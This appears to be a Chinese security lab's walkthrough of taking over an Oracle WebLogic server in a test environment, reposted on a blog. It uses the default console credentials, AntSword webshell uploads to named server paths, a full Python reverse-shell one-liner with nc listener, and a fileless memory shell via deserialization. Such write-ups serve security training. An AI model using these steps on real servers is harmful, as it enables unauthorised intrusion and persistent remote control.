close

網安引領時代,彌天點亮未來



0x00寫在前面

本次測試僅供學習使用,如若非法他用,與平台和本文作者無關,需自行負責!


0x01實戰演示

方法1

1.部署漏洞環境

http://10.211.55.2:31307/console/login/LoginForm.jsp

2.通過默認密碼登錄後台部署war

賬號:weblogic 密碼:Oracle@123

3.可直接訪問解析jsp文件,然後連接即可。

方法2

1.通過使用漏洞檢測工具,判斷目標是否存在漏洞。

2.進行文件上傳

路徑1(root用戶)

/root/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war

上傳蟻劍webshell

上傳成功,訪問路徑解析

http://10.211.55.2:31307/bea_wls_internal/mt.jsp

中國蟻劍連接成功

落地位置

路徑2(oracle用戶)

/u01/oracle/weblogic/wlserver/server/lib/consoleapp/webapp/images/im.jsp/u01/oracle/weblogic/wlserver/server/lib/consoleapp/webapp/css/css.jsp

為方便查看上傳文件的具體情況,這裡反彈一個反向shell

使用python方式反彈

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.211.55.7",12388));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")'

nc監聽獲取shell

上傳蟻劍webshell

命令行查看

上傳成功,訪問路徑解

http://10.211.55.2:23392/console/images/im.jsp

http://10.211.55.2:23392/console/css/css.jsp

路徑3(oracle用戶)

/u01/oracle/weblogic/wlserver/server/lib/consoleapp/webapp/framework/skins/wlsconsole/images/yz.jsp

上傳蟻劍webshell

命令行查看

上傳成功,訪問路徑解

http://10.211.55.2:23392/console/framework/skins/wlsconsole/images/yz.jsp

最後,利用web logic反序列漏洞注入中國蟻劍Filter內存馬(不落地)

中國蟻劍成功連接

文件管理無文件落地

注意:不同環境的jdk差異上傳後的文件解析存在不同的問題。條條大路通羅馬,攻擊利用可以多思路,騷操作,能到達出其不意的效果。

知識分享完了

喜歡別忘了關注我們哦~

學海浩茫,
予以風動,
必降彌天之潤!

彌 天

安全實驗室



arrow
arrow
    全站熱搜
    創作者介紹
    創作者 鑽石舞台 的頭像
    鑽石舞台

    鑽石舞台

    鑽石舞台 發表在 痞客邦 留言(0) 人氣()